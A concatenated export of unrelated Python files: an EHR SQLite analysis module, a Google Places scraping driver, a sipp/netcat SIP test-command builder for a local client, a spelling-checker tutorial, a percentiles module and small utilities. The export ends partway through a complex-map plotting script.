996,847 | c0607656e12ed3ce924e48c839603f0954374588 | """Change EHR analysis to work with SQLite database."""
import datetime as dt
import sqlite3
import os
# average days per year (accounts for leap years); used for age arithmetic
DAYS_IN_YEAR = 365.25
"""Create database to store data and open connection"""
# start from a fresh database file on every run
if os.path.exists("ehr.db"):
    os.remove("ehr.db")
con = sqlite3.connect("ehr.db")  # module-wide connection shared by all functions
def parse_patient_data(filename: str) -> None:
    """Parse tab-delimited patient data into the SQLite database.

    Expected columns: Patient_ID, Gender, Date_Of_Birth, Race (extra
    columns are ignored).  Only the date portion of Date_Of_Birth is kept.
    """
    cur = con.cursor()
    cur.execute(
        """CREATE TABLE Patient (
        [Patient_ID] INTEGER PRIMARY KEY,
        [Gender] VARCHAR(10),
        [Date_Of_Birth] VARCHAR(10),
        [Race] VARCHAR(20))"""
    )
    with open(filename) as file:
        next(file)  # skip the header row, O(1)
        for line in file:  # N times
            content = line.split("\t")  # O(1)
            # keep only the date part, drop the time-of-day portion
            content[2] = content[2].split()[0]
            cur.execute("INSERT INTO Patient VALUES (?, ?, ?, ?)", content[:4])
    # bug fix: without a commit the inserted rows are lost when the
    # connection closes
    con.commit()
    return
def parse_lab_data(filename: str) -> None:
    """Parse tab-delimited lab data into the SQLite database.

    Expected columns: Patient_ID, Admission_ID, Lab_Name, Lab_Value,
    Lab_Units, Lab_Date.  Only the date portion of Lab_Date is kept.
    """
    cur = con.cursor()
    # bug fix: Patient_ID must NOT be the primary key here — a patient has
    # many lab rows, and a PRIMARY KEY constraint would make every second
    # insert for the same patient raise sqlite3.IntegrityError
    cur.execute(
        """CREATE TABLE Lab (
        [Patient_ID] INTEGER,
        [Admission_ID] INTEGER,
        [Lab_Name] VARCHAR(70),
        [Lab_Value] DECIMAL(6,2),
        [Lab_Units] VARCHAR(20),
        [Lab_Date] VARCHAR(10))"""
    )
    with open(filename) as file:
        next(file)  # skip the header row, O(1)
        for line in file:  # NM times
            content = line.split("\t")  # O(1)
            content[3] = float(content[3])
            # keep only the date part, drop the time-of-day portion
            content[5] = content[5].split()[0]
            cur.execute("INSERT INTO Lab VALUES (?, ?, ?, ?, ?, ?)", content)
    con.commit()  # persist rows so they survive connection close
    return
def num_older_than(age: float) -> int:
    """Count the patients strictly older than ``age`` years.

    Age is computed inside SQL from Date_Of_Birth via Julian-day
    arithmetic (days since birth divided by DAYS_IN_YEAR).
    """
    cur = con.cursor()
    rows = cur.execute(
        """SELECT COUNT(Patient_ID)
        FROM Patient
        WHERE (JULIANDAY('now') - JULIANDAY(Date_Of_Birth)) / ? > ?""",
        [DAYS_IN_YEAR, age],
    ).fetchall()
    return rows[0][0]
def sick_patients(lab: str, gt_lt: str, value: float) -> set[int]:
    """Return the IDs of patients with an observation of lab ``lab`` whose
    value compares to ``value`` via ``gt_lt`` ('<' or '>').

    Raises ValueError for any other operator.
    """
    # security fix: the original interpolated gt_lt AND value straight into
    # the SQL text (injection risk).  The operator cannot be a bind
    # parameter, so whitelist it; the value is now properly parameterized.
    if gt_lt not in ("<", ">"):
        raise ValueError(f"gt_lt must be '<' or '>', got {gt_lt!r}")
    cur = con.cursor()
    output = cur.execute(
        f"""SELECT DISTINCT(Patient_ID)
        FROM Lab
        WHERE Lab_Name = ?
        AND Lab_Value {gt_lt} ?""",
        [lab, value],
    ).fetchall()
    # rows hold single-element tuples; collect the IDs (annotation fixed:
    # these are ints, the original said set[str])
    patient_IDs: set[int] = {row[0] for row in output}
    return patient_IDs  # O(1)
def age_first_admission(patient_id: str) -> int:
    """Return the patient's age (whole years, floored) at first admission.

    Results are memoized across calls.  The original created a fresh cache
    dict on every invocation, so the cache could never produce a hit; the
    cache now lives on the function object and persists.
    """
    cache = age_first_admission._cache
    if patient_id in cache:
        return cache[patient_id]
    cur = con.cursor()
    rows = cur.execute(
        """SELECT (JULIANDAY(Lab_Date) - JULIANDAY(Date_Of_Birth)) / ?
        FROM Lab l
        INNER JOIN Patient p ON l.Patient_ID = p.Patient_ID
        WHERE l.Patient_ID = ?
        AND Admission_ID = 1""",
        [DAYS_IN_YEAR, patient_id],
    ).fetchall()
    age_as_int = int(rows[0][0])
    cache[patient_id] = age_as_int
    return age_as_int  # O(1)


age_first_admission._cache = {}  # persistent memoization table
def age(patient_id: str) -> int:
    """Return the patient's current age in whole years (floored).

    Results are memoized across calls.  The original created a fresh cache
    dict on every invocation, so the cache could never produce a hit; the
    cache now lives on the function object and persists.
    """
    cache = age._cache
    if patient_id in cache:
        return cache[patient_id]
    cur = con.cursor()
    rows = cur.execute(
        """SELECT (JULIANDAY('now') - JULIANDAY(Date_Of_Birth)) / ?
        FROM Patient
        WHERE Patient_ID = ?""",
        [DAYS_IN_YEAR, patient_id],
    ).fetchall()
    age_as_int = int(rows[0][0])
    cache[patient_id] = age_as_int
    return age_as_int  # O(1)


age._cache = {}  # persistent memoization table
|
996,848 | 3f76f62b60cf04214b9794384b388cb81d4f64a8 | from src.collect.google.get_places_from_google_api import get_google_places_for_current_of_higene_data_establishments
from src.collect.google.combine_to_overall_and_comments import combine_google_found_to_overall
from util import setup_logger
# module-level logger shared by everything in this script
google_logger = setup_logger("google")
def get_and_combine_to_overall():
    """Fetch Google place data for every configured local authority, then
    merge the per-authority results into the overall dataset."""
    for authority in local_authorities:
        google_logger.debug("on city: {}".format(authority))
        get_google_places_for_current_of_higene_data_establishments(authority)
    combine_google_found_to_overall()
# Local authorities still to be scraped; entries already processed have been
# commented out at the top of the list.
local_authorities = [
    #"Southampton",
    #"Corby",
    #"Hinckley and Bosworth",
    #"Rossendale",
    #"Wiltshire",
    #"Guildford",
    #"Darlington",
    # "Barnsley",
    # "North Lincolnshire",
    #"Hart",
    "Shropshire",
    "Chelmsford",
    "Horsham",
    "Islington",
    "Newport",
    "Craven",
    "Dartford",
    "Mid Devon",
    "Ipswich",
    "Tameside",
    "Epsom and Ewell",
    "Worthing",
    "Hackney",
    "Croydon",
    "Runnymede",
    "Rotherham",
    "Gloucester City",
    "Selby",
    "Stevenage",
    "York",
    "West Devon",
    "West Oxfordshire",
    "Trafford",
    "Shetland Islands",
    "North Somerset",
    "Fenland",
    "North Dorset",
    "Swansea",
    "Rochford",
    "Bridgend",
    "Tandridge",
    "Solihull",
    "Liverpool",
    "Hertsmere",
    "Lichfield",
    "Stratford-on-Avon",
    "Fife",
    "Bolton",
    "Allerdale",
    "Test Valley",
    "Tonbridge and Malling",
    "South Staffordshire",
    "Ashford",
    "North Devon",
    "Angus",
    "Carmarthenshire",
    "South Oxfordshire",
    "South Ayrshire",
    "East Renfrewshire",
    "Breckland",
    "Anglesey",
    "St Albans City",
    "South Cambridgeshire",
    "Lincoln City",
    "Nuneaton and Bedworth",
    "Rutland",
    "North Norfolk",
    "Cardiff",
    "Warwick",
    "Wyre",
    "Perth and Kinross",
    "Blackpool",
    "Waveney",
    "Hillingdon",
    "Castle Point",
    "West Berkshire",
    "Ceredigion",
    "Forest Heath",
    "Blaby",
    "Maldon",
    "Wandsworth",
    "Moray",
    "East Cambridgeshire",
    "Norwich City",
    "Barrow-in-Furness",
    "East Riding of Yorkshire",
    "South Northamptonshire",
    "East Hertfordshire",
    "Gateshead",
    "Merton",
    "Lewes",
    "Melton",
    "Broadland",
    "Preston",
    "Bury",
    "Bolsover",
    "Hounslow",
    "Reading",
    "Windsor and Maidenhead",
    "West Lothian",
    "Bradford",
    "Wychavon",
    "Carlisle City",
    "Christchurch",
    "Greenwich",
    "City of London Corporation",
    "Boston",
    "Rhondda Cynon Taf",
    "Wycombe",
    "Cherwell",
    "Oldham",
    "King's Lynn and West Norfolk",
    "Southwark",
    "Aylesbury Vale",
    "South Kesteven",
    "Midlothian",
    "Stoke-On-Trent",
    "Cannock Chase",
    "North East Lincolnshire",
    "Bromley",
    "Conwy",
    "Stockton On Tees",
    "Sefton",
    "Dumfries and Galloway",
    "Canterbury City",
    "Derry City and Strabane",
    "Bristol",
    "Huntingdonshire",
    "Worcester City",
    "Flintshire",
    "Bromsgrove",
    "Isle of Wight",
    "Winchester City",
    "Falkirk",
    "Doncaster",
    "Newham",
    "Swindon",
    "Weymouth and Portland",
    "Rother",
    "Watford",
    "Waltham Forest",
    "Bassetlaw",
    "Causeway Coast and Glens",
    "Clackmannanshire",
    "Braintree",
    "Newry, Mourne and Down",
    "South Lanarkshire",
    "Hambleton",
    "Kingston-Upon-Thames",
    "Orkney Islands",
    "Great Yarmouth",
    "Birmingham",
    "Gedling",
    "West Somerset",
    "Waverley",
    "Medway",
    "Argyll and Bute",
    "Elmbridge",
    "Harlow",
    "Stafford",
    "Sevenoaks",
    "Rugby",
    "Scottish Borders",
    "Broxtowe",
    "Suffolk Coastal",
    "Spelthorne",
    "Camden"
]
if __name__ == "__main__":
    get_and_combine_to_overall()
996,849 | c0271f309da2be7d5c93a5e2d2177ff421883953 | #-*- coding=utf-8 -*-
#author: zhihua.ye@spreadtrum.com
"""
1. assemble sipp cmd
sipp -sf reg.xml -p 5060 -t u1 -m 1 -trace_err
2. assemble tmtc cmd
echo -n "c-reg" | busybox nc 127.0.0.1 21904
"""
import sys
import json
import os
from logConf import *
from utjsonparser import *
from time import gmtime, strftime
import re
class CmdException(Exception):
    """Raised when command assembly fails; keeps the text on ``.message``."""

    def __init__(self, message):
        super(CmdException, self).__init__(message)
        self.message = message
class cmdObj(dict):
    """A dict describing one shell command: 'cmd' (the command line) and
    'timeout' (seconds to wait).  Caller-supplied entries override the
    defaults."""

    def __init__(self, *arg, **kw):
        # set defaults first, then let the dict constructor overwrite them
        self.update(cmd='', timeout=1)
        super(cmdObj, self).__init__(*arg, **kw)
class cmdhelper:
    """Reads a case directory's config.json and assembles the sipp and
    netcat (tmtc) command lines needed to drive one test scenario."""

    def __init__(self, confdir=''):
        """Load <confdir>/config.json; raises CmdException if the file
        cannot be read or parsed."""
        self.confdir = confdir
        self.config = dict()
        self.logger = logConf()
        conffile = os.path.realpath(confdir) + '/config.json'
        self.timestamp = strftime("%Y_%m_%d_%H_%M_%S", gmtime())
        try:
            with open(conffile, 'r') as conf:
                self.config = json.load(conf)
        except Exception:
            # narrowed from a bare "except:", which would also swallow
            # SystemExit/KeyboardInterrupt
            etype = sys.exc_info()[0]
            evalue = sys.exc_info()[1]
            estr = str(etype) + ' ' + str(evalue)
            self.logger.logger.error("Unexpected error:" + estr)
            raise CmdException(estr)
        self.execdir = ''
        # per-case info extracted from the config
        self.xmls = list()
        self.timeouts = list()
        # assembled command lists (kept index-aligned with each other)
        self.sippcmds = list()
        self.nccmds = list()
        # lazily built terminate command (see gettermcmd)
        self.termcmd = None

    def gettimestamp(self):
        """Timestamp captured at construction; used to name run dirs."""
        return self.timestamp

    def getDesc(self):
        """Log the scenario description from the config."""
        desc = self.config['description']
        self.logger.logger.info('scenario is ' + desc['scenario'])
        self.logger.logger.info('bug id is ' + str(desc['bugid']) + ', commit id is ' + str(desc['commitid']))

    def getCasename(self):
        """Case name string from the config's description section."""
        return self.config['description']['casename']

    def getCategory(self):
        """Case category string from the config's description section."""
        return self.config['description']['category']

    def getConfDelta(self):
        """
        provision.ini delta value (not implemented yet)
        :return:
        """
        pass

    def getUeConfig(self):
        """Build the UE-side configuration dict, merging defaults with any
        overrides from config.json's "ue" section.  Also records the
        per-run exec directory (casename + timestamp) in self.execdir."""
        ueconfig = dict()
        ueconfig['tmtcport'] = 21904
        # if there is whitespace in the casename, replace it with '_'
        # NOTE(review): the class [\s+] also matches a literal '+' — confirm intended
        newcasename = re.sub(r'[\s+]', '_', self.config['description']['casename'])
        postfix = newcasename + '_' + self.timestamp
        ueconfig['execdir'] = "/data/data/ut/" + postfix
        ueconfig['config'] = "provision.ini"
        ueconfig['binary'] = 'tmtclient'
        ueconfig['startuptime'] = 3
        ueconfig['lib'] = [
            "libavatar_ut.so",
            "liblemon_ut.so"
        ]
        ueconfig['preference'] = dict()
        if 'preference' in self.config['ue']:
            ueconfig['preference'] = self.config['ue']['preference']
        if 'tmtcport' in self.config['ue']:
            ueconfig['tmtcport'] = self.config['ue']['tmtcport']
        if 'execdir' in self.config['ue']:
            ueconfig['execdir'] = self.config['ue']['execdir'] + postfix
        if 'config' in self.config['ue']:
            ueconfig['config'] = self.config['ue']['config']
        if 'binary' in self.config['ue']:
            ueconfig['binary'] = self.config['ue']['binary']
        if 'lib' in self.config['ue']:
            ueconfig['lib'] = self.config['ue']['lib']
        if 'startuptime' in self.config['ue']:
            ueconfig['startuptime'] = self.config['ue']['startuptime']
        self.execdir = ueconfig['execdir']
        return ueconfig

    def buildCmd(self):
        """Assemble, for every entry in config['cases'], one sipp command
        and one netcat command (a dummy when the case has no tmtc cmd) so
        that self.sippcmds and self.nccmds stay index-aligned.  Raises
        CmdException on a malformed case entry."""
        cases = self.config['cases']
        for index, case in enumerate(cases):
            try:
                # init
                sippcmd = cmdObj()
                nccmd = cmdObj()
                xml = case['xml']
                timeout = case['timeout']
                tmtccmd = case['tmtccmd']
                desc = case['desc']
                opts = ''
                if 'opts' in case:
                    opts = case['opts']
                self.xmls.append(xml)
                self.timeouts.append(timeout)
                if validCmd(tmtccmd) is False:
                    tmtccmd = None
                if xml:
                    sippcmd = self.buildsipp(xml, timeout, desc, opts=opts)
                    self.sippcmds.append(sippcmd)
                if tmtccmd:
                    nccmd = self.buildnc(tmtccmd)
                    self.nccmds.append(nccmd)
                else:
                    # just keep nccmds the same length as sippcmds
                    dummynccmd = cmdObj()
                    dummynccmd['cmd'] = DUMMY_CMD
                    self.nccmds.append(dummynccmd)
            except Exception:
                # narrowed from a bare "except:"; most likely KeyError
                etype = sys.exc_info()[0]
                evalue = sys.exc_info()[1]
                estr = str(etype) + ' ' + str(evalue)
                self.logger.logger.error("Unexpected error:" + estr)
                raise CmdException(estr)

    def buildsipp(self, xml='', timeout=None, desc=None, opts=''):
        """
        Build one sipp command line, e.g.:
        sipp -sf reg.xml -p 5060 -t u1 -m 1 -trace_err -trace_msg -message_file reg.msg -trace_shortmsg -shortmessage_file regshort.msg
        sipp -sf mt_815908.xml 127.0.0.1:5065 -p 5060 -t u1 -m 1 -trace_err -trace_msg -message_file mt.msg -trace_shortmsg -shortmessage_file mtshort.msg
        :return: cmdObj with 'cmd', 'timeout' and 'desc'
        """
        sippcmd = cmdObj()
        # message-trace files are named after the xml scenario file
        prefix = xml.split('.')[0]
        msgopt = " -trace_msg -message_file " + str(prefix) + ".msg "
        shortmsgopt = " -trace_shortmsg -shortmessage_file " + str(prefix) + "short.msg "
        cdcmd = "cd " + self.execdir
        sippcmd['cmd'] = cdcmd + "&& sipp -sf " + xml + ' ' + opts + ' -p 5060 -t u1 -m 1 -trace_err ' + msgopt + shortmsgopt
        sippcmd['timeout'] = timeout
        sippcmd['desc'] = desc
        return sippcmd

    def buildnc(self, cmd=''):
        """
        Build the netcat command that forwards a tmtc command, e.g.:
        adb shell echo -n "c-reg" | busybox nc 127.0.0.1 21904
        (loopback device, tmtc listening on the configured port)
        :return: cmdObj
        """
        tmtcport = 21904
        if 'tmtcport' in self.config['ue']:
            tmtcport = self.config['ue']['tmtcport']
        nccmd = cmdObj()
        nccmd['cmd'] = "echo -n " + cmd + ' | busybox nc 127.0.0.1 ' + str(tmtcport)
        # FIXME: nc should respond quickly, hardcoded here.
        nccmd['timeout'] = 1
        return nccmd

    def getxmls(self):
        """Scenario xml file names, in case order."""
        return self.xmls

    def gettimeouts(self):
        """Per-case timeouts, in case order."""
        return self.timeouts

    def getsippcmds(self):
        """Assembled sipp cmdObjs (call buildCmd() first)."""
        return self.sippcmds

    def getnccmds(self):
        """Assembled netcat cmdObjs, index-aligned with getsippcmds()."""
        return self.nccmds

    def gettermcmd(self):
        """Build (and cache on self) the netcat command that tells the
        tmtc server to exit."""
        self.termcmd = cmdObj()
        tmtcport = 21904
        if 'tmtcport' in self.config['ue']:
            tmtcport = self.config['ue']['tmtcport']
        self.termcmd['cmd'] = "echo -n exit" + ' | busybox nc 127.0.0.1 ' + str(tmtcport)
        self.termcmd['timeout'] = 1
        return self.termcmd

    def printCmds(self):
        """Log every assembled sipp/netcat command pair."""
        for index, sipp in enumerate(self.sippcmds):
            self.logger.logger.info("< Flow No." + str(index + 1) + ' >')
            self.logger.logger.info('sippcmd is ' + sipp['cmd'] + ', timeout is ' + str(sipp['timeout']))
            self.logger.logger.info('netcat cmd is ' + self.nccmds[index]['cmd'] +
                                    ', timeout is ' + str(self.nccmds[index]['timeout']))
# Smoke test: build and print the commands for the bundled "mt" case.
if __name__ == '__main__':
    cmd = cmdhelper(confdir="../cases/mt/")
    cmd.getDesc()
    cmd.buildCmd()
    ueconfig = cmd.getUeConfig()
    cmd.printCmds()
|
996,850 | ca95509c5264c6257a233f094ad448358fcb2ff2 | Spelling checker in Python
For any type of text processing or analysis, checking the spelling of the word
is one of the basic requirements. This article discusses various ways that you
can check the spellings of the words and also can correct the spelling of the
respective word.
## Using textblob library
First, you need to install the library **textblob** using pip in command
prompt.
pip install textblob
You can also install this library in Jupyter Notebook as:
## Python3
__
__
__
__
__
__
__
import sys
!{sys.executable} -m pip install textblob
---
__
__
**Program for Spelling checker –**
## Python3
__
__
__
__
__
__
__
from textblob import TextBlob
a = "cmputr" # incorrect spelling
print("original text: "+str(a))
b = TextBlob(a)
# prints the corrected spelling
print("corrected text: "+str(b.correct()))
---
__
__
**Output:**
original text: cmputr
corrected text: computer
## Using pyspellchecker library
You can install this library as below:
**Using pip:**
pip install pyspellchecker
**In Jupyter Notebook:**
## Python3
__
__
__
__
__
__
__
import sys
!{sys.executable} -m pip install pyspellchecker
---
__
__
**Spelling Checker program using pyspellchecker –**
## Python3
__
__
__
__
__
__
__
from spellchecker import SpellChecker
spell = SpellChecker()
# find those words that may be misspelled
misspelled = spell.unknown(["cmputr", "watr", "study",
"wrte"])
for word in misspelled:
# Get the one most likely answer
print(spell.correction(word))
# Get a list of likely options
print(spell.candidates(word))
---
__
__
**Output:**
computer
{'caput', 'caputs', 'compute', 'computor', 'impute', 'computer'}
water
{'water', 'watt', 'warr', 'wart', 'war', 'wath', 'wat'}
write
{'wroe', 'arte', 'wre', 'rte', 'wrote', 'write'}
## Using JamSpell
To achieve the best quality while making spelling corrections dictionary-based
methods are not enough. You need to consider the word surroundings. JamSpell
is a python spell checking library based on a language model. It makes
different corrections for a different context.
1) Install swig3
apt-get install swig3.0 # for linux
brew install swig@3 # for mac
2) Install jamspell
pip install jamspell
3) Download a language model for your language
## Python3
__
__
__
__
__
__
__
# Create a corrector
corrector = jamspell.TSpellCorrector()
# Load Language model -
# argument is a downloaded model file path
corrector.LoadLangModel('Downloads/en_model.bin')
# To fix text automatically run FixFragment:
print(corrector.FixFragment('I am the begt spell cherken!'))
# To get a list of possible candidates
# pass a split sentence and a word position
print(corrector.GetCandidates(['i', 'am', 'the', 'begt',
'spell', 'cherken'], 3))
print(corrector.GetCandidates(['i', 'am', 'the', 'begt',
'spell', 'cherken'], 5))
---
__
__
**Output:**
u'I am the best spell checker!'
(u'best', u'beat', u'belt', u'bet', u'bent')
(u'checker', u'chicken', u'checked', u'wherein', u'coherent', ...)
Attention geek! Strengthen your foundations with the **Python Programming
Foundation** Course and learn the basics.
To begin with, your interview preparations Enhance your Data Structures
concepts with the **Python DS** Course.
My Personal Notes _arrow_drop_up_
Save
|
996,851 | 56b1d183e0781351833a6e2a30e8e5aff899e436 | import psycopg2
import os
from urllib.parse import urlparse
# DATABASE_URL has the form postgres://user:password@host:port/dbname
url = urlparse(os.environ['DATABASE_URL'])
dbname = url.path[1:]  # strip the leading '/' from the URL path
db = psycopg2.connect(dbname=dbname, user=url.username, password=url.password, host=url.hostname, port=url.port)
996,852 | 8d24fc1ed4f59a01c2fe28a614697ac5bd0ac969 | def check_equal(str1, str2):
return str1 == str2
# demo: compare three sample strings
str1 = 'hei'
str2 = 'hello'
str3 = 'hello'
print(check_equal(str1, str2))  # False
print(check_equal(str3, str2))  # True
996,853 | ffee632df6dd2467eaaba69ada94a059fcba73cb | from my_home_server.models.user import User
class AuthenticationContext(object):
    """Process-wide holder of the authenticated user (static singleton)."""
    # the single shared instance (name-mangled class attribute)
    __authentication_context = None

    @staticmethod
    def init_context(user: User):
        """Install a fresh context holding ``user`` as the current user."""
        AuthenticationContext.__authentication_context = AuthenticationContext()
        AuthenticationContext.__authentication_context.current_user = user

    @staticmethod
    def get_current_user() -> User:
        """Return the user set by init_context.
        NOTE(review): raises AttributeError when init_context was never
        called — confirm callers guarantee initialization first."""
        return AuthenticationContext.__authentication_context.current_user
996,854 | 9c65b135d6566e780f451c5e1e4efb690576b323 | from enum import Enum
from pydantic import BaseModel
class MyException(Exception):
    """Generic application-level error for this module."""
    pass
class Index(str, Enum):
    """Known indicator names (values are the Russian display strings)."""
    KeyRate = "Ключевая ставка"   # key interest rate
    USD = "Курс USD"              # USD exchange rate
    EURO = "Курс EURO"            # EUR exchange rate
    CurrencyRate = "Курс обмена"  # generic exchange rate
class Information:
    """Mutable record of one observed indicator value on a given date."""

    def __init__(self, dt):
        # name and value are filled in later by the collector
        self.name = None
        self.date = dt
        self.value = None
class Config(BaseModel):
    """Pydantic settings: which indicator to fetch and where to fetch it."""
    # NOTE(review): annotated str but defaults to None — pydantic v1 treats
    # this as Optional[str]; confirm before tightening the annotation
    index: str = None
    # indicator -> source URL used for scraping
    index_map = {
        Index.KeyRate: 'http://www.cbr.ru/hd_base/KeyRate/',
        Index.USD: 'http://www.cbr.ru/currency_base/dynamics/',
        Index.EURO: 'http://www.cbr.ru/currency_base/dynamics/',
        Index.CurrencyRate: 'http://www.cbr.ru/scripts/XML_daily.asp',
    }

    def get_url(self):
        """URL for the configured indicator; KeyError when unset/unknown."""
        return self.index_map[self.index]
    # 'http://www.cbr.ru/eng/currency_base/daily/'
    # http://www.cbr.ru/scripts/XML_daily.asp?date_req=02/03/2002
996,855 | 35301682e0ed9e4fb98ee66a673f51f12b62fb59 | import argparse
import cv2
import matplotlib.pyplot as plt
import key_feature_extraction as key
def setup_cli():
    """Define the viewer's command-line interface and parse sys.argv.

    Positional: path to a key image.  Flags: -c/--canny (show edges),
    -d/--distance and -f/--fourier (second image to compare against),
    --centroid_off (stores False, hiding the centroid marker).
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("path")
    parser.add_argument("-c", "--canny", action="store_true")
    parser.add_argument("-d", "--distance")
    parser.add_argument("-f", "--fourier")
    parser.add_argument("--centroid_off", action="store_false")
    return parser.parse_args()
def view_single_key(img_path, centroid=True):
    """Display one key image with its contour; optionally mark the
    contour's centroid with a filled green dot."""
    image = key.load_img(img_path)
    contour = key.get_key_contour(image)
    image = key.resize_img(image)
    if centroid:
        # centroid from the contour's spatial moments
        moments = cv2.moments(contour)
        cx = int(moments["m10"] / moments["m00"])
        cy = int(moments["m01"] / moments["m00"])
        cv2.circle(image, (cx, cy), 7, (0, 255, 0), -1)
    key.view_contours(image, contour)
    key.pause()
def view_single_key_canny(img_path):
    """Show the Canny-edge preprocessing of a key image."""
    edges = key.preprocess_img(key.load_img(img_path))
    key.show_img(edges)
    key.pause()
def compare_dist(img_path_1, img_path_2):
    """Overlay the (min-shifted) centroid-distance profiles of two keys."""
    profiles = []
    for path in (img_path_1, img_path_2):
        img = key.load_img(path)
        contour = key.get_key_contour(img)
        center = key.find_center(contour)
        dists = key.find_distances(contour, center)
        # shift so both profiles start at their minimum, making them comparable
        profiles.append(key.shift_distance_min(dists))
    for profile in profiles:
        plt.plot(profile)
    plt.show()
def compare_fourier(img_path_1, img_path_2):
    """Overlay the truncated, max-shifted Fourier descriptors of the
    centroid-distance profiles of two keys."""
    for path in (img_path_1, img_path_2):
        img = key.load_img(path)
        contour = key.get_key_contour(img)
        center = key.find_center(contour)
        dists = key.shift_distance_min(key.find_distances(contour, center))
        # keep only the 70 lowest-frequency coefficients, then align on max
        fft = key.fourier_transform(dists)[:70]
        plt.plot(key.shift_distance_max(list(fft)))
    plt.show()
if __name__ == "__main__":
    args = setup_cli()
    # modes checked in priority order: distance > fourier > canny > plain view
    if args.distance:
        compare_dist(args.path, args.distance)
    elif args.fourier:
        compare_fourier(args.path, args.fourier)
    elif args.canny:
        view_single_key_canny(args.path)
    else:
        # --centroid_off stores False, so the centroid shows by default
        view_single_key(args.path, args.centroid_off)
|
996,856 | a3ade0a1697fde66c59795fa8aa20162ff8a8ab3 | import numpy as np
from progressivis.core.utils import (slice_to_arange, indices_len, fix_loc)
from . import Table
from . import TableSelectedView
from ..core.slot import SlotDescriptor
from .module import TableModule
from ..core.bitmap import bitmap
from .mod_impl import ModuleImpl
from .binop import ops
from collections import OrderedDict
class Percentiles(TableModule):
    """Progressive module that tracks a set of percentiles of an indexed
    column, using the per-bucket bitmaps maintained by a histogram index
    instead of sorting the whole column."""
    parameters = [('accuracy', np.dtype(float), 0.5)
                  ]

    def __init__(self, hist_index, scheduler=None, **kwds):
        """hist_index: histogram-index module whose bucket bitmaps are
        used to locate percentile positions."""
        self._add_slots(kwds, 'input_descriptors',
                        [SlotDescriptor('table', type=Table, required=True),
                         SlotDescriptor('percentiles', type=Table, required=True)])
        super(Percentiles, self).__init__(scheduler=scheduler, **kwds)
        self._accuracy = self.params.accuracy
        self._hist_index = hist_index
        self.default_step_size = 1000

    def compute_percentiles(self, points, input_table):
        """Return an OrderedDict mapping each entry of ``points``
        (name -> percentage in [0, 100]) to an approximate percentile
        value of the indexed column of ``input_table``."""
        column = input_table[self._hist_index.column]
        hii = self._hist_index._impl

        def _filter_tsv(bm):
            # restrict each bucket bitmap to the view's selection
            return bm & input_table.selection

        def _no_filtering(bm):
            return bm
        _filter = _filter_tsv if isinstance(input_table,
                                            TableSelectedView) else _no_filtering
        len_ = len(input_table)
        # target rank (1-based position) for each requested percentage
        k_points = [p * (len_ + 1) * 0.01 for p in points.values()]
        max_k = max(k_points)
        ret_values = []
        # buckets smaller than this budget can be answered by any member
        k_accuracy = self._accuracy * len_ * 0.01
        acc = 0
        lbm = len(hii.bitmaps)
        acc_list = np.empty(lbm, dtype=np.int64)
        sz_list = np.empty(lbm, dtype=np.int64)
        bm_list = []
        for i, bm in enumerate(hii.bitmaps):
            fbm = _filter(bm)
            sz = len(fbm)
            acc += sz
            sz_list[i] = sz
            acc_list[i] = acc
            bm_list.append(fbm)
            if acc > max_k:
                break  # no bucket past the largest requested rank is needed
        acc_list = acc_list[:i + 1]
        for k in k_points:
            # first bucket whose cumulative count reaches rank k
            i = (acc_list >= k).nonzero()[0][0]
            remainder = int(acc_list[i] - k)
            assert sz_list[i] > remainder >= 0
            if sz_list[i] < k_accuracy:
                # cheap path: the bucket is narrower than the accuracy
                # budget, so any member is close enough — take the first
                ret_values.append(column[bm_list[i][0]])
            else:
                # exact path: partial sort and pick the wanted offset.
                # Bug fix: the original appended values[remainder],
                # discarding the np.partition result entirely.
                # NOTE(review): remainder counts down from the bucket's
                # cumulative total — confirm the offset orientation matches
                # the intended rank within the bucket.
                values = column.loc[bm_list[i]]
                part = np.partition(values, remainder)
                ret_values.append(part[remainder])
        return OrderedDict(zip(points.keys(), ret_values))

    def run_step(self, run_number, step_size, howlong):
        """One scheduler step: consume slot change queues and refresh the
        single-row output table whenever the input data or the requested
        percentile points changed."""
        input_slot = self.get_input_slot('table')
        input_slot.update(run_number)
        steps = 0
        if input_slot.deleted.any():
            input_slot.deleted.next(step_size)
            steps = 1
        if input_slot.created.any():
            input_slot.created.next(step_size)
            steps = 1
        if input_slot.updated.any():
            input_slot.updated.next(step_size)
            steps = 1
        with input_slot.lock:
            input_table = input_slot.data()
        percentiles_slot = self.get_input_slot('percentiles')
        percentiles_slot.update(run_number)
        percentiles_changed = False
        if percentiles_slot.deleted.any():
            percentiles_slot.deleted.next()
        if percentiles_slot.updated.any():
            percentiles_slot.updated.next()
            percentiles_changed = True
        if percentiles_slot.created.any():
            percentiles_slot.created.next()
            percentiles_changed = True
        if len(percentiles_slot.data()) == 0:
            return self._return_run_step(self.state_blocked, steps_run=0)
        if steps == 0 and not percentiles_changed:
            # nothing new on either slot: stay blocked
            return self._return_run_step(self.state_blocked, steps_run=0)
        if not self._hist_index._impl:
            # histogram index not built yet
            return self._return_run_step(self.state_blocked, steps_run=0)
        computed = self.compute_percentiles(
            percentiles_slot.data().last().to_dict(ordered=True),
            input_slot.data())
        if not self._table:
            self._table = Table(name=None, dshape=percentiles_slot.data().dshape)
            self._table.add(computed)
        else:
            # output is a single row, overwritten in place
            self._table.loc[0, :] = list(computed.values())
        return self._return_run_step(self.next_state(input_slot), steps_run=steps)
|
996,857 | 57421a8355d18c2893a9b8f6326c9526663e1904 | # -*- coding: utf-8 -*-
"""
Created on Mon May 21 15:22:39 2018
@author: Ramsey
"""
import numpy as np
import matplotlib.pyplot as plt
# get a bifurcation plot of x^2+c
# start with x = whatever, maybe 0?
def func(x, c):
    """One step of the quadratic map z -> z*z + c (scalars or arrays)."""
    squared = np.multiply(x, x)
    return squared + c
# NOTE(review): lower_bound/upper_bound/step_size/final_iterations/x_init are
# never used below — presumably leftovers from an earlier bifurcation sweep.
lower_bound = -2
upper_bound = .25
step_size = .0001
initial_iterations = 10
final_iterations = 20
x_init = 0  # could change this to be random
#c = 0.4 - 0.325j
c = 0 + 0j
# draw the real and imaginary axes in red
plt.plot([-1,0,1],[0,0,0],c="r")
plt.plot([0,0,0],[-1,0,1],c="r")
# let things settle to a steady state
num_points = 360
for xs in range(num_points):
    yp = [ pow(2,0.5)/2 ]
    xp = []
    # NOTE(review): the next two assignments to x are dead — only the final
    # unit-circle point below is used
    x = xs/5 - 1 + 1j*yp[0]
    x = -pow(2,0.5)/2 +1j*yp[0]
    # starting point on the unit circle at angle 2*pi*xs/num_points
    x = np.cos(2*np.pi*xs/ num_points) + np.sin(2*xs*np.pi/num_points) * 1j
